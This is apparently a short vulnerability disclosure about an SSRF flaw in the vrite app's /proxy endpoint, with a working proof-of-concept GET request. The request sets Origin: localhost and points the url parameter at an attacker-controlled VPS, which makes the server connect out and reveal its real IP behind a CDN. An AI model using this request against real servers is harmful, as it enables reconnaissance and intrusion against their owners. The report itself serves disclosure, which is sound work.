SSRF vulnerability in the vrite in vriteio/vrite
Sep 27th 2023
This vulnerability can be used to leak remote server information, bypass CDN like cloudflare. Also it can be used to the SSRF attack.
Proof of Concept
Here we can use it to leak the real IP of the
GET /proxy?url=https://your-vps-ip.nip.io/ Host: app.vrite.io Origin: localhost Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8" Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 Sec-Ch-Ua-Platform: "Linux" Accept: */* Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://app.vrite.io/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9
Just send a GET request to the remote server. Adding
Origin: localhost within the header.
Set the proxy url parameter to your vps address. And you will receive a connection from the real vrite server.
Leak the real IP address of your website, and use it to do SSRF attack.